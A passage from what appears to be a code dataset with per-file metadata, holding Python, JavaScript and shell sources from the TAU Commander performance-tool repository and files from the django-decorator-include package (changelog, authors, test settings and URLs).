'string',\n 'required': True,\n 'defaultsTo': defaultHostArch(),\n 'argparse': {'flags': ('--host-arch',),\n 'group': 'target system',\n 'help': 'Host architecture',\n 'metavar': 'arch'}\n },\n 'device_arch': {\n 'type': 'string',\n 'defaultsTo': defaultDeviceArch(),\n 'argparse': {'flags': ('--device-arch',),\n 'group': 'target system',\n 'help': 'Coprocessor architecture',\n 'metavar': 'arch'}\n },\n 'CC': {\n 'model': 'Compiler',\n 'required': True,\n 'defaultsTo': defaultCC(),\n 'argparse': {'flags': ('--cc',),\n 'group': 'compiler',\n 'help': 'C Compiler',\n 'metavar': '<command>'}\n },\n 'CXX': {\n 'model': 'Compiler',\n 'required': True,\n 'defaultsTo': defaultCXX(),\n 'argparse': {'flags': ('--cxx','--c++'),\n 'group': 'compiler',\n 'help': 'C++ Compiler',\n 'metavar': '<command>'}\n },\n 'FC': {\n 'model': 'Compiler',\n 'required': True,\n 'defaultsTo': defaultFC(),\n 'argparse': {'flags': ('--fc','--fortran'),\n 'group': 'compiler',\n 'help': 'Fortran Compiler',\n 'metavar': '<command>'}\n },\n 'cuda': {\n 'type': 'string',\n 'argparse': {'flags': ('--with-cuda',),\n 'group': 'software package',\n 'help': 'Path to NVIDIA CUDA installation',\n 'metavar': '<path>'}\n },\n 'tau_source': {\n 'type': 'string',\n 'defaultsTo': 'download',\n 'argparse': {'flags': ('--with-tau',),\n 'group': 'software package',\n 'help': 'URL or path to a TAU installation or archive file',\n 'metavar': '(<path>|<url>|\"download\")'}\n },\n 'pdt_source': {\n 'type': 'string',\n 'defaultsTo': 'download',\n 'argparse': {'flags': ('--with-pdt',),\n 'group': 'software package',\n 'help': 'URL or path to a PDT installation or archive file',\n 'metavar': '(<path>|<url>|\"download\")'}\n },\n 'bfd_source': {\n 'type': 'string',\n 'defaultsTo': 'download',\n 'argparse': {'flags': ('--with-bfd',),\n 'group': 'software package',\n 'help': 'URL or path to a BFD installation or archive file',\n 'metavar': '(<path>|<url>|\"download\")'}\n },\n 'libunwind_source': {\n 'type': 'string',\n 'argparse': {'flags': ('--with-libunwind',),\n 'group': 'software package',\n 'help': 'URL or path to a libunwind installation or archive file',\n 'metavar': '(<path>|<url>|\"download\")'}\n }\n }\n \n _valid_name = set(string.digits + string.letters + '-_.')\n \n def onCreate(self):\n if set(self['name']) > Target._valid_name:\n raise ctl.ModelError('%r is not a valid target name.' % self['name'],\n 'Use only letters, numbers, dot (.), dash (-), and underscore (_).')\n" }, { "alpha_fraction": 0.6680698990821838, "alphanum_fraction": 0.6703851819038391, "avg_line_length": 28.15337371826172, "blob_id": "a486d0105a0ecc493fe12f01042f4dcb86e99b18", "content_id": "bbed7e49200b39255acba6fec43d575e8dde76e8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4751, "license_type": "permissive", "max_line_length": 105, "num_lines": 163, "path": "/packages/tau/error.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\nimport traceback\n\n# TAU modules\nimport tau\nimport logger\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass Error(Exception):\n \"\"\"\n Base class for errors in Tau\n \"\"\"\n \n show_backtrace = False\n \n message_fmt = \"\"\"\nAn unexpected %(typename)s exception was raised:\n\n%(value)s\n\n%(backtrace)s\n\nPlease e-mail '%(logfile)s' to %(contact)s for assistance.\n\"\"\"\n \n def __init__(self, value, hint=\"Contact %s\" % tau.HELP_CONTACT):\n self.value = value\n self.hint = hint\n \n def __str__(self):\n return self.value\n \n def handle(self, etype, e, tb):\n if self.show_backtrace:\n backtrace = ''.join(traceback.format_exception(etype, e, tb))\n else:\n backtrace = ''\n message = self.message_fmt % {'value': self.value,\n 'hint': 'Hint: %s' % self.hint,\n 'typename': etype.__name__, \n 'cmd': ' '.join([arg for arg in sys.argv[1:]]), \n 'contact': tau.HELP_CONTACT,\n 'logfile': logger.LOG_FILE,\n 'backtrace': backtrace}\n LOGGER.critical(message)\n sys.exit(tau.EXIT_FAILURE)\n\n\nclass InternalError(Error):\n \"\"\"\n Indicates that an internal error has occurred\n These are bad and really shouldn't happen\n \"\"\"\n show_backtrace = True\n \n def __init__(self, value):\n super(InternalError, self).__init__(value)\n\n\nclass ConfigurationError(Error):\n \"\"\"\n Indicates that Tau cannot succeed with the given parameters\n \"\"\"\n \n message_fmt = \"\"\"\n%(value)s\n%(hint)s\n\nTAU cannot proceed with the given inputs. \nPlease check the selected configuration for errors or contact %(contact)s for assistance.\n\"\"\"\n \n def __init__(self, value, hint=\"Try `tau --help`\"):\n super(ConfigurationError, self).__init__(value, hint)\n\n\nclass SoftwarePackageError(Error):\n \"\"\"\n Indicates there was an error in an external software package \n \"\"\"\n \n message_fmt = \"\"\"\n%(value)s\n%(hint)s\n\nPlease check the selected configuration for errors or email '%(logfile)s' to %(contact)s for assistance.\n\"\"\"\n\n def __init__(self, value, hint=\"Try `tau --help`\"):\n super(SoftwarePackageError, self).__init__(value, hint)\n\n\ndef excepthook(etype, e, tb):\n \"\"\"\n Exception handler for any uncaught exception (except SystemExit).\n \"\"\"\n if etype == KeyboardInterrupt:\n LOGGER.info('Received keyboard interrupt. Exiting.')\n sys.exit(tau.EXIT_WARNING)\n else:\n try:\n sys.exit(e.handle(etype, e, tb))\n except AttributeError, err:\n LOGGER.critical(\"\"\"\nAn unexpected %(typename)s exception was raised:\n\n%(value)s\n\n%(backtrace)s\n\nThis is a bug in TAU.\nPlease email '%(logfile)s' to %(contact)s for assistance\n\"\"\" % {'value': e,\n 'typename': etype.__name__, \n 'cmd': ' '.join([arg for arg in sys.argv[1:]]), \n 'contact': tau.HELP_CONTACT,\n 'logfile': logger.LOG_FILE,\n 'backtrace': ''.join(traceback.format_exception(etype, e, tb))})\n sys.exit(tau.EXIT_FAILURE)\n\n# Set the default exception handler\nsys.excepthook = excepthook" }, { "alpha_fraction": 0.6610939502716064, "alphanum_fraction": 0.6636379957199097, "avg_line_length": 33.8291130065918, "blob_id": "10c9f8895a6ef86dc125279765e298a9f6b218de", "content_id": "853fe107de93aaa589f24b9bc62b5765d54d95e5", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5503, "license_type": "permissive", "max_line_length": 96, "num_lines": 158, "path": "/packages/tau/arguments.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport argparse\n\n# TAU modules\nimport logger\n\n\nSUPPRESS = argparse.SUPPRESS\nREMAINDER = argparse.REMAINDER\n\n\nclass MutableGroupArgumentParser(argparse.ArgumentParser):\n \"\"\"\n Argument parser that permits groups to be updated\n \"\"\"\n def getGroup(self, title):\n for group in self._action_groups:\n if group.title == title:\n return group\n return None\n\nclass ArgparseHelpFormatter(argparse.RawDescriptionHelpFormatter):\n \"\"\"\n Custom formatter for argparse\n \"\"\"\n def __init__(self, prog, indent_increment=2, max_help_position=30, width=logger.LINE_WIDTH):\n super(ArgparseHelpFormatter,self).__init__(prog, indent_increment, max_help_position, width)\n\n def _split_lines(self, text, width):\n parts = []\n for line in text.splitlines():\n parts.extend(argparse.HelpFormatter._split_lines(self, line, width))\n return parts\n\n def _get_help_string(self, action):\n indent = ' '*self._indent_increment\n help = action.help\n choices = getattr(action, 'choices', None)\n if choices:\n help += '\\n%s- %s: (%s)' % (indent, action.metavar, ', '.join(choices))\n if '%(default)' not in action.help:\n if action.default is not argparse.SUPPRESS:\n defaulting_nargs = [argparse.OPTIONAL, argparse.ZERO_OR_MORE]\n if action.option_strings or action.nargs in defaulting_nargs:\n help += '\\n%s' % indent + '- default: %(default)s'\n return help\n \n\nclass ParseBooleanAction(argparse.Action):\n \"\"\"\n Parses an option value into a boolean\n \"\"\"\n def __call__(self, parser, namespace, value, option_string=None):\n if isinstance(value, bool):\n bool_value = value\n elif value.lower() in ['1', 't', 'y', 'true', 'yes', 'on']:\n bool_value = True\n elif value.lower() in ['0', 'f', 'n', 'false', 'no', 'off']:\n bool_value = False\n else:\n raise argparse.ArgumentError(self, 'Boolean value required')\n setattr(namespace, self.dest, bool_value)\n \n\ndef getParser(arguments, prog=None, usage=None, description=None, epilog=None):\n \"\"\"\n Builds and argparse.ArgumentParser from the given arguments\n \"\"\"\n parser = argparse.ArgumentParser(prog=prog, \n usage=usage, \n description=description,\n epilog=epilog,\n formatter_class=ArgparseHelpFormatter)\n for arg in arguments:\n flags, options = arg\n parser.add_argument(*flags, **options)\n return parser\n\n\ndef getParserFromModel(model, use_defaults=True,\n prog=None, usage=None, description=None, epilog=None):\n \"\"\"\n Builds an argparse.ArgumentParser from a model's attributes\n \"\"\"\n parser = MutableGroupArgumentParser(prog=prog, \n usage=usage, \n description=description,\n epilog=epilog,\n formatter_class=ArgparseHelpFormatter)\n groups = {}\n for attr, props in model.attributes.iteritems():\n try:\n options = dict(props['argparse'])\n except KeyError:\n continue\n try:\n default = props['defaultsTo']\n except KeyError:\n options['default'] = argparse.SUPPRESS\n else:\n if use_defaults and default:\n options['default'] = default\n else:\n options['default'] = argparse.SUPPRESS \n try:\n group_name = options['group'] + ' arguments'\n except KeyError:\n group = parser\n else:\n del options['group']\n groups.setdefault(group_name, parser.add_argument_group(group_name))\n group = groups[group_name]\n try:\n flags = options['flags']\n except KeyError:\n flags = (attr,)\n else:\n del options['flags']\n options['dest'] = attr\n group.add_argument(*flags, **options)\n return parser\n" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.5564236044883728, "avg_line_length": 17.59677505493164, "blob_id": "e9dfeee7b37939de56af8cfda3e70fee171a359b", "content_id": "8ca05ce6f310684ff7b899cd0a4bd4c83f6b6186", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1152, "license_type": "permissive", "max_line_length": 108, "num_lines": 62, "path": "/commander/api/models/Project.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Project.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n \n attributes: {\n\n // One-to-many association\n user: {\n model: 'User',\n required: true \n },\n\n // Project name\n name: {\n type: 'string',\n required: true\n },\n\n // Targets used by this project (N-N)\n targets: {\n collection: 'Target',\n via: 'projects',\n dominant: true\n },\n\n // Applications used by this project (N-N)\n applications: {\n collection: 'Application',\n via: 'projects',\n dominant: true\n },\n\n // Measurements used by this project (N-N)\n measurements: {\n collection: 'Measurement',\n via: 'projects',\n dominant: true\n },\n\n // Debuggers used by this project (N-N)\n debuggers: {\n collection: 'Debugger',\n via: 'projects',\n dominant: true\n },\n\n // Trials generated by this project (1-N)\n trials: {\n collection: 'Trial',\n via: 'project',\n dominant: true\n }\n\n }\n};" }, { "alpha_fraction": 0.6573324799537659, "alphanum_fraction": 0.6594067811965942, "avg_line_length": 34.43382263183594, "blob_id": "d22b2248db2d8075a9f3dd1642173d1ea1a685bb", "content_id": "259f90114482b7213f7fbf874d73c77b1138b983", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4821, "license_type": "permissive", "max_line_length": 88, "num_lines": 136, "path": "/packages/tau/model/__init__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\nfrom pkgutil import walk_packages\n\n# TAU modules\nimport logger\nimport error\nimport controller\n\nModelError = controller.ModelError\n\n# List model classes\ndef _yieldModelClasses():\n for _, module_name, _ in walk_packages(__path__, __name__+'.'):\n __import__(module_name)\n module_dict = sys.modules[module_name].__dict__\n model_class_name = module_name.split('.')[-1].capitalize()\n try:\n model_class = module_dict[model_class_name]\n except KeyError:\n raise error.InternalError(\"module '%s' does not define class '%s'\" % \n (module_name, model_class_name))\n yield model_class\nMODEL_CLASSES = list(_yieldModelClasses())\n\n# Index model classes by name\nMODELS = dict([(cls.__name__, cls) for cls in MODEL_CLASSES])\n\n\ndef _getPropsModelName(props):\n try:\n return props['model']\n except KeyError:\n return props['collection']\n\n# Set cls.model_name\nfor cls_name, cls in MODELS.iteritems():\n cls.model_name = cls_name\n\n# Set cls.associations\nfor cls_name, cls in MODELS.iteritems():\n if not hasattr(cls, 'associations'):\n cls.associations = {}\n if not hasattr(cls, 'references'):\n cls.references = set()\n\n for attr, props in cls.attributes.iteritems():\n via = props.get('via', None)\n try:\n foreign_name = _getPropsModelName(props)\n except KeyError:\n if via:\n raise ModelError(cls, \"Attribute '%s' defines 'via' property \"\n \"but not 'model' or 'collection'\" % attr)\n else:\n continue\n \n try:\n foreign_cls = MODELS[foreign_name]\n except KeyError:\n raise ModelError(cls, \"Invalid model name in attribute '%s'\" % attr)\n if not hasattr(foreign_cls, 'associations'):\n foreign_cls.associations = {}\n if not hasattr(foreign_cls, 'references'):\n foreign_cls.references = set()\n \n forward = (foreign_cls, via)\n reverse = (cls, attr)\n if not via:\n foreign_cls.references.add(reverse)\n else:\n foreign_cls.associations[via] = reverse\n try:\n via_props = foreign_cls.attributes[via]\n except KeyError:\n raise ModelError(cls, \"Found 'via' on undefined attribute '%s.%s'\" % \n (foreign_name, via))\n try:\n via_attr_model_name = _getPropsModelName(via_props)\n except KeyError:\n raise ModelError(cls, \"Found 'via' on non-model attribute '%s.%s'\" % \n (foreign_name, via))\n if via_attr_model_name != cls_name:\n raise ModelError(cls, \"Attribute %s.%s referenced by 'via' in '%s' \"\n \"does not define 'collection' or 'model' of type '%s'\" % \n (foreign_name, via, attr, cls_name))\n try:\n existing = cls.associations[attr]\n except KeyError:\n cls.associations[attr] = forward\n else:\n if existing != forward:\n raise ModelError(cls, \n \"Conflicting associations on attribute '%s': \" \n \"%r vs. %r\" % (attr, existing, forward))\n \n# Clean up\ndel _yieldModelClasses\ndel _getPropsModelName \n\n" }, { "alpha_fraction": 0.5455046892166138, "alphanum_fraction": 0.567291796207428, "avg_line_length": 19.70857048034668, "blob_id": "25cc9a7d03d7fc0ec0fb3d2f1bc4d70b974af576", "content_id": "dafa7f7ecb7695b522ac3e8904c8032984385124", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3626, "license_type": "permissive", "max_line_length": 109, "num_lines": 175, "path": "/packages/tau/util/archfind/archfind", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "#!/bin/sh \n\n# converted to sh, (12/14/2007)\n\n# Based on parts of tcsh's tc.vers.c && PVM's aimk\n\n# Originally hacked by Bernd Mohr\n# Modified by Pete Beckman (3/2/95)\n# Modified by Lars Thomas Hansen (2/27/95); very minor fixes for Solaris\n\n# Command line parameters:\n# -x provide cross-development architecture name (for cm?, rs6k, etc)\n# -l provide long name\n# -s SPECIAL. Used to differentiate two very similar architectures\n\n#echo foo\nARCHTESTFILE=$0.c\nARCHLISTFILE=$0.txt\nARCH=\nXDEV=\nSPECIAL=\n\n# TAU_CCOM may be defined by the caller to the name of the c compiler\n# for this user and system, as given on the command line.\n#\n# Not everyone uses gcc.\n\nif [ \"x$TAU_CCOM\" = \"x\" ]; then\n TAU_CCOM=cc\nfi\n\nif [ `uname -s ` = \"Darwin\" ]; then\n TAU_CCOM=c++\n ARCH=apple\nfi\n\n# check for ARM linux so it covers uname -m output such as armv7l or arm*\nuname_output=`uname -m`\nmatch_string=\"arm\"\ntest_arg=${uname_output#$match_string}\nif [ \"y$test_arg\" != \"y$uname_output\" ]\nthen\n TAU_CCOM=gcc\n ARCH=arm_linux\nfi\n\n#if [ -d /usr/linux-k1om-* ]\n#then\n# ARCH=mic_linux\n#fi\n\nif [ `uname -s ` = \"HI-UX/MPP\" ]; then \n ARCH=`$TAU_CCOM $MSG_EQ_E -E $ARCHTESTFILE | sed -e '/^#/d' -e '/^[ ]*$/d' -e 's/^ARCH//'` \nelse\n if [ \"x$ARCH\" = \"x\" ]; then\n# ARCH has not been assigned yet.\n if [ \"x$PE_ENV\" = \"xCRAY\" ]; then\n TAU_W_FLAG=\"\" \n else\n TAU_W_FLAG=-w\n fi\n ARCH=`$TAU_CCOM $TAU_W_FLAG -E $ARCHTESTFILE | sed -e '/^#/d' -e '/^[ ]*$/d' -e 's/^ARCH//'` \n\n if [ \"$TAU_CCOM\" = \"mcc\" ] ; then\n ARCH=`$TAU_CCOM $TAU_W_FLAG -E $ARCHTESTFILE | sed -e '/^#/d' -e '/^[ ]*$/d' -e 's/^ARCH//' | tail -1` \n fi\n\n if [ \"x$ARCH\" = \"x\" ] ; then \n\t exit\n fi\n fi\nfi\n\n# Check for brain-dead solaris compiler\nif [ \"$ARCH\" = \"sun4\" ]; then\n VER=`uname -r | cut -c0-2`\n if [ $VER = \"5.\" ]; then\n\tARCH=solaris2\n fi\nfi\n\n\n# Check for SGI Symmetric Multiprocessing engine\nif [ \"$ARCH\" = \"sgi4k\" -o \"$ARCH\" = \"sgi8k\" ]; then\n # Run \"hinv\" and check for the number of processors\n /bin/hinv 2>&1 | /usr/bsd/head -1 2>&1 | /bin/grep \"^1 \" &> /dev/null\n if [ $? = 1 ]; then\n\tXDEV=\"sgimp $XDEV\"\n fi\nfi \n\n# Check for Meiko CS2\nif [ \"$ARCH\" = \"solaris2\" -a -d \"/opt/MEIKOcs2\" ]; then\n XDEV=\"cs2 $XDEV\"\nfi\n\n# Check for cray-t3d xdev environment for Cray C90\nif [ \"$ARCH\" = \"c90\" -a -d \"/mpp/bin\" ]; then\n XDEV=\"t3d $XDEV\"\nfi\n\n# Check for Convex SPP engine\nif [ \"$ARCH\" = \"hp9000s800\" ]; then\n if [ -d /usr/convex ]; then\n\tXDEV=\"cnxspp $XDEV\"\n fi\nfi\n\n# Check for RS6000 based IBM SPx\nif [ \"$ARCH\" = \"rs6000\" ]; then\n if [ -f /bin/mpcc ]; then\n\tXDEV=\"sp1 $XDEV\"\n fi\nfi\n\nif [ \"$ARCH\" = \"unknown\" ]; then\n#See if users path finds an 'arch' command, if so, use it! (a little sloppy)\n arch &> /dev/null\n if [ $? != 0 ]; then\n#This machine does not have an 'arch' command\n#Or at least one that correctly sets the arch\n\n#Try another guess....\n\tif [ -e /usr/bin/getcube ]; then\n\t ARCH=i860 \n\tfi\n else\n# 'arch' command found, use it!\n\tARCH=`arch`\n fi\n\n if [ \"$ARCH\" = \"unknown\" ]; then\n\tif [ `uname -s` = \"FreeBSD\" ]; then\n\t ARCH=freebsd\n\tfi\n fi\n\n if [ $# = 1 ]; then\n\tif [ \"$1\" = \"-x\" ]; then\n\t if [ \"x$XDEV\" = \"x\" ]; then\n\t\techo none\n\t\texit 1\n\t else\n\t\techo $XDEV\n\t\texit 0\n\t fi\n\telse\n\t if [ \"$argv[1]\" = \"-l\" ]; then\n\t\tgrep $ARCH $ARCHLISTFILE\n\t\tif [ $ARCH = \"unknown\" ]; then\n\t\t exit 1\n\t\telse\n\t\t exit 0\n\t\tfi\n\t else\n\t\tif [ \"$1\" = \"-s\" ]; then\n\t\t if [ \"x$SPECIAL\" = \"x\" ]; then\n\t\t\techo none\n\t\t\texit 1\n\t\t else\n\t\t\techo $SPECIAL\n\t\t\texit 0\n\t\t fi\n\t\tfi\n\t fi\n\tfi\n fi\nfi\n\necho $ARCH\nif [ \"$ARCH\" = \"unknown\" ]; then\n exit 1\nelse\n exit 0\nfi\n\n\n" } ]
49
Bartvds/django-decorator-include
https://github.com/Bartvds/django-decorator-include
93fc52dc4a8c34fd8ef1c84cef35e8878eb29a9c
10fb1775dded482cc16dec5a619efafd8b42fec6
ffe358e5cb02bfdc3422dec20140fadd6405cf71
refs/heads/master
2021-01-20T15:18:45.062701
2016-12-28T21:31:11
2016-12-28T21:31:11
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.33157894015312195, "alphanum_fraction": 0.44736841320991516, "avg_line_length": 24.909090042114258, "blob_id": "a7dd7123da14fc8ffd86a5300a6fcbf1c5af101e", "content_id": "dd5f86f4386f2f563cb5f2a9fabc41ad4b066482", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 570, "license_type": "permissive", "max_line_length": 55, "num_lines": 22, "path": "/CHANGELOG.rst", "repo_name": "Bartvds/django-decorator-include", "src_encoding": "UTF-8", "text": "Changelog\n=========\n\nRelease *v1.2* - ``2016-12-28``\n---------------------------------\n* official support for Django 1.10\n\nRelease *v1.1* - ``2016-12-15``\n-------------------------------\n* stop importing module in ``__init__``\n\nRelease *v1.0* - ``2016-03-13``\n---------------------------------\n* first official release, adding support for Django 1.9\n\nRelease *v0.2* - ``2014-11-09``\n---------------------------------\n* support for Python 3 and Django 1.6+\n\nRelease *v0.1* - ``2014-03-18``\n---------------------------------\n* initial version by Jeff Kistler (data: 2011-06-07)\n" }, { "alpha_fraction": 0.6696428656578064, "alphanum_fraction": 0.7321428656578064, "avg_line_length": 36.66666793823242, "blob_id": "c277f3bd03bb56abd7443bde6feb2852746f54ca", "content_id": "5455544099af0bfc93517fce5e8bbec355c12922", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 112, "license_type": "permissive", "max_line_length": 58, "num_lines": 3, "path": "/AUTHORS.rst", "repo_name": "Bartvds/django-decorator-include", "src_encoding": "UTF-8", "text": "``decorator_include`` was written by Jeff Kistler in 2011.\n\nAdapted for py3 and django 1.6+ by Stephane \"twidi\" Angel." }, { "alpha_fraction": 0.704365074634552, "alphanum_fraction": 0.7073412537574768, "avg_line_length": 24.200000762939453, "blob_id": "65365ff6a404b57ef57cf4dd88380c87b042a947", "content_id": "b35aee66b1e72531ba3e044ec72a5e04c3bc859c", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1008, "license_type": "permissive", "max_line_length": 62, "num_lines": 40, "path": "/src/decorator_include/tests/testproject/settings.py", "repo_name": "Bartvds/django-decorator-include", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals\nimport os.path\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nSECRET_KEY = '8qw5o&7!g&4kg#+4jr6y%qoj6(1s1ufjqo1#x)fqaca&)$2)ba'\n\nBASE_DIR = os.path.dirname(__file__)\n\ndef absolute_path(path):\n return os.path.normpath(os.path.join(BASE_DIR, path))\n\nSITE_ID = 1\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': absolute_path('database.sqlite3'),\n }\n}\n\nINSTALLED_APPS = [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'decorator_include',\n]\n\nROOT_URLCONF = 'decorator_include.tests.urls'\n\nMIDDLEWARE_CLASSES = [\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n" }, { "alpha_fraction": 0.7517730593681335, "alphanum_fraction": 0.7517730593681335, "avg_line_length": 27.200000762939453, "blob_id": "f586a41a6945f81598d0c2edc26b8ace38886400", "content_id": "5eaf2901748741198b3f9fd942fa37c883610e64", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 423, "license_type": "permissive", "max_line_length": 93, "num_lines": 15, "path": "/src/decorator_include/tests/urls.py", "repo_name": "Bartvds/django-decorator-include", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals\nfrom django.conf.urls import url\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom decorator_include import decorator_include\n\n\ndef index(request):\n return HttpResponse('Index!')\n\nurlpatterns = [\n url(r'^$', index, name='index'),\n url(r'^include/', decorator_include(login_required, 'decorator_include.tests.included')),\n]\n" } ]
4
Bryantmj/Final
https://github.com/Bryantmj/Final
998ea1535937893305c5b3bd235f40d6aa284f41
f5f202ed799dce863a4c4ce7d1361beded250ac0
2a3a7ff189b0c95f689c38f2a03b1b30f4fb01bf
refs/heads/master
2021-08-30T22:44:26.930816
2017-12-19T17:37:51
2017-12-19T17:37:51
114,793,073
0
0
null
null
null
null
null
